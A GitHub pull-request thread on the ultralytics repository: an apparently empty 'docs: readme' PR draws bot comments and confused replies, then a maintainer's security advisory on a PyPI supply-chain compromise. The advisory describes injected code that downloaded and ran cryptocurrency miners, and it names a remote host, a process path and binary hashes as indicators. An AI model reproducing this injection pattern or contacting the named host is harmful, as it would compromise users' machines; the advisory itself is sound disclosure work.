docs: readme

[openimbot]

🛠️ PR Summary

_{Made with ❤️ by Ultralytics Actions}

🌟 Summary

This PR doesn't introduce any new code changes.

📊 Key Changes

• None; the diff shows zero modifications.

🎯 Purpose & Impact

• This PR might be used for testing, documentation updates, or preparing for future changes, but it has no direct impact on the codebase or users at this time. 🛠️

[UltralyticsAssistant]

👋 Hello @openimbot, thank you for submitting an ultralytics/ultralytics 🚀 PR! To ensure a seamless integration of your work, please review the following checklist:

• ✅ Define a Purpose: Clearly explain the purpose of your fix or feature in your PR description, and link to any relevant issues. Ensure your commit messages are clear, concise, and adhere to the project's conventions.
• ✅ Synchronize with Source: Confirm your PR is synchronized with the ultralytics/ultralytics main branch. If it's behind, update it by clicking the 'Update branch' button or by running git pull and git merge main locally.
• ✅ Ensure CI Checks Pass: Verify all Ultralytics Continuous Integration (CI) checks are passing. If any checks fail, please address the issues.
• ✅ Update Documentation: Ensure your changes align with the project's formatting standards and contribute to the clarity and consistency of the documentation, even for minor updates like this one.
• ✅ Minimize Changes: Since this PR is a documentation update, it's already following the principle of limited, targeted changes—great job! 👏

For more guidance, please refer to our Contributing Guide, and feel free to leave a comment below if you’re unsure about anything.

Thank you for helping improve Ultralytics' documentation! An Ultralytics engineer will review your PR soon. 🚀

[CPlusPatch]

bro what 💀

[AsherJingkongChen]

What did the bot do?

[glenn-jocher]

Security Advisory: Unauthorized Code in PyPI Releases

Summary

Ultralytics has identified a supply chain attack affecting affecting multiple versions of the ultralytics package. The compromised versions contained unauthorized code that downloaded and executed cryptocurrency mining software when instantiating YOLO models. This code was injected into the PyPI release artifacts and was not present in the public GitHub repository.

Technical Details

The unauthorized code performed the following actions:

1. Detected user system architecture
2. Downloaded cryptocurrency mining binaries from GitHub blob storage
3. Executed the mining software as a subprocess

Affected binaries were hosted at:

• Linux x86: 665bb8add8c21d28a961fe3f93c12b249df10787
• MacOS arm64: 5e67b0e4375f63eb6892b33b1f98e900802312c2

The malicious process manifested as /tmp/ultralytics_runner and attempted connections to connect.consrensys.com:8080.

Impact

All users who installed and ran affected versions from PyPI were potentially affected. The malicious code was activated upon YOLO model initialization. Source installations from GitHub were not affected.

Affected Versions

• Compromised PyPI versions: 8.3.41, 8.3.42, 8.3.45, 8.3.46
• Clean versions: >=8.3.47

Mitigation

1. Immediately upgrade to version 8.3.47 or later
2. Check for and terminate any unexpected processes named ultralytics_runner
3. Remove any suspicious files in the /tmp directory (on Unix-based systems)

Resolution

We have:

• Removed all affected versions from PyPI
• Released clean version 8.3.47
• Secured our PyPI publishing workflow
• Initiated investigation into our build pipeline
• Implementing additional security measures for future releases

Additional Information

This incident appears to be a sophisticated supply chain attack that bypassed PyPI provenance signing. We are conducting a thorough investigation and implementing enhanced security measures to prevent similar incidents.